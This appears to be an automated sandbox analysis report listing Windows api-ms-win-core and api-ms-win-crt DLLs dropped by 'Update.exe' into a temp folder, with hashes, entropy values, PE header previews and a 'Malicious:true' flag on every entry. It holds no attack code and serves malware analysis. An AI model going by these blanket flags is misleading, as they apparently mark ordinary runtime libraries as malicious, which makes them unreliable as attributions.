                                  SHA-512:DF22CF16490FAA0DC809129CA32EAF1A16EC665F9C5411503CE0153270DE038E5D3BE1E0E49879A67043A688F6C42BDB5A9A6B3CEA43BF533EBA087E999BE653
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...m............." .........................................................0.......X....`.........................................`...L............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l2-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.946959524345588
                                  Encrypted:false
                                  SSDEEP:192:WrVzWfhW5eWvcuyjS7HnhWgN7a8Wh/g26WGaN4NhrJgX01k9z3An9fXPu:WrVzWfhW57HRN7qTN4tgR9zY8
                                  MD5:7F14FD0436C066A8B40E66386CEB55D0
                                  SHA1:288C020FB12A4D8C65ED22A364B5EB8F4126A958
                                  SHA-256:C78EAB8E057BDDD55F998E72D8FDF5B53D9E9C8F67C8B404258E198EB2CDCF24
                                  SHA-512:D04ADC52EE0CEED4131EB1D133BFE9A66CBC0F88900270B596116064480AFE6AE6CA42FEB0EAED54CB141987F2D7716BB2DAE947A025014D05D7AA0B0821DC50
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....'............" .........................................................0......w.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-handle-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.862911306065441
                                  Encrypted:false
                                  SSDEEP:192:WxWfhWmeWvcuyjS7HnhWgN7aUWhR1+Eh+Il+jX01k9z3AReXz:WxWfhWg7HRN7eEQEjR9zSeD
                                  MD5:10F0C22C19D5BEE226845CD4380B4791
                                  SHA1:1E976A8256508452C59310CA5987DB3027545F3D
                                  SHA-256:154EF0BF9B9B9DAA08101E090AA9716F0FA25464C4EF5F49BC642619C7C16F0E
                                  SHA-512:3A5D3DC6448F65E1613E1A92E74F0934DD849433CECA593E7F974310CD96BF6AD6CCC3B0CB96BDB2DCC35514BC142C48CB1FD20FEE0D8FA236999AD155FC518B
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0...........`.........................................`...`............ ...................'..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-heap-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.815548225091973
                                  Encrypted:false
                                  SSDEEP:192:WUZlKWfhWieWvcuyjS7HnhWgN7a8WhwXh+Il+jX01k9z3ARxiXNk:W6lKWfhWM7HRN7J5EjR9zSw9k
                                  MD5:405038FB22CD8F725C2867C9B4345B65
                                  SHA1:385F0EB610FCE082B56A90F1B10346C37C19D485
                                  SHA-256:1C1B88D403E2CDE510741A840AFA445603F76E542391547E6E4CC48958C02076
                                  SHA-512:B52752AC5D907DC442EC7C318998FD54AD9AD659BDE4350493FE5CA95286ECEFCBBBF82D718D4BF4E813B4D20A62CD1F7BA11EE7C68C49EC39307B7746968D18
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....Bb.........." .........................................................0......[.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-interlocked-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.877222097685592
                                  Encrypted:false
                                  SSDEEP:192:WzWfhWceWvcuyjS7HnhWgN7a8Whkh+Il+jX01k9z3ARNXJXEmo:WzWfhWG7HRN7NEjR9zSN5XJo
                                  MD5:AFF9165CFF0FB1E49C64B9E1EAEFDD86
                                  SHA1:CDEF56AB5734D10A08BC373C843ABC144FE782CB
                                  SHA-256:159ECB50F14E3C247FAEC480A3E6E0CF498EC13039C988F962280187CEE1391D
                                  SHA-512:64DDF8965DEFAF5E5AE336D37BDB3868538638BAD927E2E76E06ACE51A2BCA60AEFAAB18C300BB7E705F470A937AD978EDD0338091AD6BCC45564C41071EEB40
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-libraryloader-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14248
                                  Entropy (8bit):6.819759709049553
                                  Encrypted:false
                                  SSDEEP:192:WivuBL3BBLJWfhWGeWvcuyjS7HnhWgN7a8WhfZVh+Il+jX01k9z3ARLFXWk:WivuBL3BrWfhWA7HRN7cZLEjR9zSZGk
                                  MD5:4334F1A7B180998473DC828D9A31E736
                                  SHA1:4C0C14B5C52AB5CF43A170364C4EB20AFC9B5DD4
                                  SHA-256:820E3ACD26AD7A6177E732019492B33342BC9200FC3C0AF812EBD41FB4F376CB
                                  SHA-512:7F2A12F9D41F3C55C4AFF2C75EB6F327D9434269EBFF3FBCC706D4961DA10530C069720E81B1573FAF919411F929304E4AAF2159205CF9A434B8833EEA867AA9
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-localization-l1-2-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):15776
                                  Entropy (8bit):6.867557538513122
                                  Encrypted:false
                                  SSDEEP:384:WbOMw3zdp3bwjGjue9/0jCRrndbWsWfhWU7HRN7ApUad+JR9zuszu:yOMwBprwjGjue9/0jCRrndbGDVadk9zk
                                  MD5:71457FD15DE9E0B3AD83B4656CAD2870
                                  SHA1:C9C2CAF4F9E87D32A93A52508561B4595617F09F
                                  SHA-256:DB970725B36CC78EF2E756FF4B42DB7B5B771BFD9D106486322CF037115BD911
                                  SHA-512:A10FCF1D7637EFFFF0AE3E3B4291D54CC7444D985491E82B3F4E559FBB0DBB3B6231A8C689FF240A5036A7ACAE47421CDA58AAA6938374D4B84893CCE0077BC8
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....V............" .........................................................0............`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-memory-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.854527300629819
                                  Encrypted:false
                                  SSDEEP:192:W/qWfhW0eWvcuyjS7HnhWgN7a8Wh+Yq21eX01k9z3ABfNB/xqw:W/qWfhWe7HRN7Ql8R9zmfNB0w
                                  MD5:D39FBBEAC429109849EC7E0DC1EC6B90
                                  SHA1:2825C7ABA7F3E88F7B3D3BC651BBC4772BB44AD0
                                  SHA-256:AEEC3D48068137870E6E40BAD9C9F38377AA06C6EA1AC288E9E02AF9E8C28E6B
                                  SHA-512:B4197A4D19535E20ED2AFF4F83ACED44E56ABBB99CE64E2F257D7F9B13882CBDB16D8D864F4923499241B8F7D504D78FF93F22B95F7B02996B15BB3DA1A0EF42
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....2..........." .........................................................0............`.........................................`...l............ ...................'..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-namedpipe-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.955574425170444
                                  Encrypted:false
                                  SSDEEP:192:WUWfhWyeWvcuyjS7HnhWgN7a8WhYw0mh+Il+jX01k9z3ARj4XGAzux:WUWfhWc7HRN7GXEjR9zSk2AzA
                                  MD5:0E5CD808E9F407E75F98BBB602A8DF48
                                  SHA1:285E1295A1CF91EF2306BE5392190D8217B7A331
                                  SHA-256:1846947C10B57876239D8CB74923902454F50B347385277F5313D2A6A4E05A96
                                  SHA-512:7D8E35CABE7C3B963E6031CD73DC5AD5EDF8B227DF735888B28D8EFB5744B531F0C84130E47624E4FEA8EF700EABDE20A4E2290A1688A6ACFFB6A09CA20D7085
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....5..........." .........................................................0......z.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processenvironment-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14248
                                  Entropy (8bit):6.824261156098003
                                  Encrypted:false
                                  SSDEEP:192:WAWWfhWZeWvcuyjS7HnhWgN7a8Wh0Dq21eX01k9z3ABfNBd5++x:WAWWfhWZ7HRN7rDl8R9zmfNBf+k
                                  MD5:CC52CD91B1CBD20725080F1A5C215FCC
                                  SHA1:2CE6A32A5BD6FA9096352D3D73E7B19B98E0CC49
                                  SHA-256:990DC7898FD7B442D50BC88FEC624290D69F96030A1256385391B05658952508
                                  SHA-512:D262F62ADDE8A3D265650A4B56C866BDD2B660001FB2CA679D48EE389254E9FFA6CE9D69F2AAA619D22A155A5523DCE5F7CFDD7638C0E9DF1FE524B09520D5A3
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....h..........." .........................................................0......8.....`.........................................`...H............ ...................'..............T............................................................................rdata..T...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processthreads-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):15272
                                  Entropy (8bit):6.869458023567228
                                  Encrypted:false
                                  SSDEEP:384:WyWXk1JzNcKSIHWfhWH7HRN7pEjR9zSgX:BbcKStkpEF9zZ
                                  MD5:2DD711EA0F97CB7C5AB98AE6F57B9439
                                  SHA1:CBA11E3EEBE7B3D007EB16362785F5D1D1251ACD
                                  SHA-256:A958FD20C06C90112E9E720047D84531B2BD0C77174660DC7E1F093A2ED3CC68
                                  SHA-512:D8D39CA07FDFED6A4E5686EAE766022941C19BFBCEB5972EDD109B453FD130B627E3E2880F8580A8A41601493D0C800E64A76E8590070AA13C1ABD550BD1A1BA
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....,-a.........." .........................................................0......$.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processthreads-l1-1-1.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.883994552966322
                                  Encrypted:false
                                  SSDEEP:192:WKtyDfIe9jWfhWyReWvcuyjS7HnhWgN7a8WhXO/h+Il+jX01k9z3AR/iXiz:WKtyDfIe9jWfhWyR7HRN7Y6EjR9zSqe
                                  MD5:E93816C04327730D41224E7A1BA6DC51
                                  SHA1:3F83B9FC6291146E58AFCE5B5447CD6D2F32F749
                                  SHA-256:CA06CCF12927CA52D8827B3A36B23B6389C4C6D4706345E2D70B895B79FF2EC8
                                  SHA-512:BEAAB5A12BFC4498CDF67D8B560EF0B0E2451C5F4634B6C5780A857666FD14F8A379F42E38BE1BEEFA1C3578B2DF913D901B271719AC6794BFAAB0731BB77BCA
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...I............." .........................................................0......V.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-profile-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):12712
                                  Entropy (8bit):6.988937791517322
                                  Encrypted:false
                                  SSDEEP:192:W7AaVWfhWdieWvcuyjS7HnhWgN7a8Whvrq21eX01k9z3ABfNBo3:W7AIWfhWdM7HRN7Ul8R9zmfNB0
                                  MD5:051847E7AA7A40A1B081FF4B79410B5B
                                  SHA1:4CA24E1DA7C5BB0F2E9F5F8CE98BE744EA38309E
                                  SHA-256:752542F72AF04B3837939F0113BFCB99858E86698998398B6CD0E4E5C3182FD5
                                  SHA-512:1BFB96D15DF1CD3DCEFC933AECA3CE59BEF90E4575A66EAAB92386F8E93652906626308886DD9B82C0863D1544331BBF99BE8E781FA71D8C4C1F5FFF294056DC
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...xc.].........." .........................................................0......Eg....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-rtlsupport-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.826511666056111
                                  Encrypted:false
                                  SSDEEP:192:WLGeVxWfhWkeWvcuyjS7HnhWgN7a8WhZch+Il+jX01k9z3ARLXX:WLGeVxWfhWO7HRN7HEjR9zSLn
                                  MD5:2AA1F0C20DFB4586B28FAF2AA16B7B00
                                  SHA1:3C4E9C8FCA6F24891430A29B155876A41F91F937
                                  SHA-256:D2C9EE6B1698DFE99465AF4B7358A2F4C199C907A6001110EDBEA2D71B63CD3F
                                  SHA-512:AE05338075972E258BCF1465E444C0A267AD6F03FBB499F653D9D63422A59AC28F2CB83EC25F1181699E59ECBAAC33996883E0B998CBADE1CC011BC166D126D0
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...L.\w.........." .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-string-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.908697555398443
                                  Encrypted:false
                                  SSDEEP:192:WvyMv9WfhW0FCeWvcuyjS7HnhWgN7a8Wh/kkQOh+Il+jX01k9z3ARpXZE:WvyMv9WfhWas7HRN7x0EjR9zSppE
                                  MD5:6E5DA9819BD53DCB55ABDE1DA67F3493
                                  SHA1:8562859EBF3CE95F7ECB4E2C785F43AD7AAAF151
                                  SHA-256:30DC0DEB0FAF0434732F2158AD24F2199DEF8DD04520B9DAABBC5F0B3B6DDF40
                                  SHA-512:75EB227CA60FF8E873DAC7FA3316B476B967069E8F0AC31469B2DE5A9B21044DB004353FEBF2B53069392BE10A8BF40563BB5D6D4BE774D37D12CF6FBECED175
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0.......v....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-synch-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):15272
                                  Entropy (8bit):6.791010772317001
                                  Encrypted:false
                                  SSDEEP:384:WWdv3V0dfpkXc0vVaCWfhWU7HRN7wTN4tgR9zYYB:/dv3VqpkXc0vVabjwTNx9zlB
                                  MD5:F378455FB81488F5BFD3617E3C5A75C0
                                  SHA1:312FA1343498E99565B1FBF92E6E1E05351CBC99
                                  SHA-256:91E50F94A951AA4E48A9059AD222BBE132B02E83D4A7DF94A35EA73248E84800
                                  SHA-512:11D80D4F58DA3827A317A3C1ED501432050E123EB992ED58C7765C68DDD2FC49B04398149E73FDB9FB3AA4494B440333AA26861B796E7AE8C7AD730F4FAF99F7
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`...X............ ...................'..............T............................................................................rdata..X...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-synch-l1-2-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.926691835908429
                                  Encrypted:false
                                  SSDEEP:192:WttZ36WfhWBaeWvcuyjS7HnhWgN7a8WhEaNh+Il+jX01k9z3ARPXnge:WttZ36WfhWBk7HRN7LMEjR9zSP3z
                                  MD5:5E393142274D7589AD3DF926A529228C
                                  SHA1:B9CA32FCC7959CB6342A1165B681AD4589C83991
                                  SHA-256:219CC445C1AD44F109219A3BB6900AB965CB6357504FC8110433B14F6A9B57BE
                                  SHA-512:5EB31BE9BCE51A475C18267D89EE7B045AF37B9F0722BAAA85764114326C7A8D0A1662135E102D7AC074C24A6035232A527FC8745139A26CB62F33913ACE3178
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......C.....`.........................................`...x............ ...................'..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-sysinfo-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14248
                                  Entropy (8bit):6.829698799977648
                                  Encrypted:false
                                  SSDEEP:192:WWKIMFqnWfhWpeWvcuyjS7HnhWgN7a8Wh8oSh+Il+jX01k9z3ARMiXxT8:WWTnWfhWp7HRN7poqEjR9zSXm
                                  MD5:7B997BD96CB7FA92DEE640D5030F8BEA
                                  SHA1:EE258D5F6731778363AA030A6BC372CA9A34383C
                                  SHA-256:4BCD366EAF0BDE99B472FA2BF4E0DDA1D860B3F404019FB41BBB8AD3A6D4D8F2
                                  SHA-512:92B9F4DD0B8CC66A92553418A1E18BBBEE775F4051CD49AF20505151BE20B41DB11D42C7F2436A6FA57E4C55F55A0519A1960E378F216BA4D7801E2EFB859B2A
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...hI$..........." .........................................................0............`.........................................`...H............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-timezone-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.908054226003342
                                  Encrypted:false
                                  SSDEEP:192:W2HtoXeOWfhWteWvcuyjS7HnhWgN7a8WhPh+Il+jX01k9z3ARiXC:WmOWfhWd7HRN7IEjR9zSiS
                                  MD5:ACF40D5E6799231CF7E4026BAD0C50A0
                                  SHA1:8F0395B7E7D2AAC02130F47B23B50D1EAB87466B
                                  SHA-256:64B5B95FE56B6DF4C2D47D771BEC32BD89267605DF736E08C1249B802D6D48D1
                                  SHA-512:F66A61E89231B6DC95B26D97F5647DA42400BC809F70789B9AFC00A42B94EA3487913860B69A1B0EE59ED5EB62C3A0CADE9E21F95DA35FDD42D8CE51C5507632
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....\]\.........." .........................................................0......Sp....`.........................................`...H............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-util-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.845813488265057
                                  Encrypted:false
                                  SSDEEP:192:WfRWWfhWEeWvcuyjS7HnhWgN7a8WhAq21eX01k9z3ABfNBhKD5lx:WfRWWfhWu7HRN7rl8R9zmfNBUD5lx
                                  MD5:7A75BC355CA9F0995C2C27977FA8067E
                                  SHA1:1C98833FD87F903B31D295F83754BCA0F9792024
                                  SHA-256:52226DC5F1E8CD6A22C6A30406ED478E020AC8E3871A1A0C097EB56C97467870
                                  SHA-512:BA96FDD840A56C39AAA448A2CFF5A2EE3955B5623F1B82362CB1D8D0EC5FBB51037BDC9F55FE7B6C9F57932267E151E167E7F8D0CB70E907D03A48E0C2617B5B
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......Z.........." .........................................................0.......I....`.........................................`...<............ ...................'..............T............................................................................rdata..8...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-conio-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14240
                                  Entropy (8bit):6.852755058390383
                                  Encrypted:false
                                  SSDEEP:384:Woc5WfhWW7HRN7yI4hBnRmuTcR9z/BIWd:7hxyH7RmuU9zld
                                  MD5:19876C0A273C626F0E7BD28988EA290E
                                  SHA1:8E7DD4807FE30786DD38DBB0DACA63256178B77C
                                  SHA-256:07FDA71F93C21A43D836D87FEE199AC2572801993F00D6628DBA9B52FCB25535
                                  SHA-512:CDD405F40AC1C0C27E281C4932FBBD6CC84471029D7F179ECF2E797B32BF208B3CD0CA6F702BB26F070F8CDD06B773C7BEB84862E4C01794938932146E74F1CA
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...='..........." .........................................................0............`.......................................................... ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-convert-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):17312
                                  Entropy (8bit):6.653286066355999
                                  Encrypted:false
                                  SSDEEP:192:WjJpdkKBcyxWfhWueWvcuyjS7HnhWgN7aoWhl9MMBdRgjLX01k9z3Azsu70S3:WnuyxWfhWI7HRN7GleLR9zusu7H
                                  MD5:D66741472C891692054E0BAC6DDE100B
                                  SHA1:4D7927E5BEA5CAC77A26DC36B09D22711D532C61
                                  SHA-256:252B14D09B0EA162166C50E41AEA9C6F6AD8038B36701981E48EDFF615D3ED4B
                                  SHA-512:C5AF302F237C436AC8FE42E0E017D9ED039B4C6A25C3772059F0A6929CBA3633D690D1F84AB0460BEB24A0704E2E1FE022E0E113780C6F92E3D38D1AFA8CEE95
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......n.........." .........................................................@......U.....`..........................................................0...................'..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-environment-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.828467063666851
                                  Encrypted:false
                                  SSDEEP:192:W3WfhWTeWvcuyjS7HnhWgN7a8WhkJh+Il+jX01k9z3ARdXd3:W3WfhWr7HRN7PPEjR9zSdJ
                                  MD5:0EEB09C06C6926279484C3F0FBEF85E7
                                  SHA1:D074721738A1E9BB21B9A706A6097EC152E36A98
                                  SHA-256:10EB78864EBFF85EFC91CC91804F03FCD1B44D3A149877A9FA66261286348882
                                  SHA-512:3CEB44C0CA86928D2FDD75BF6442FEBAFACA4DE79108561E233030635F428539C44FAAE5BCF12FF6AA756C413AB7558CCC37EEF8008C8AA5B37062D91F9D3613
                                  Malicious:true
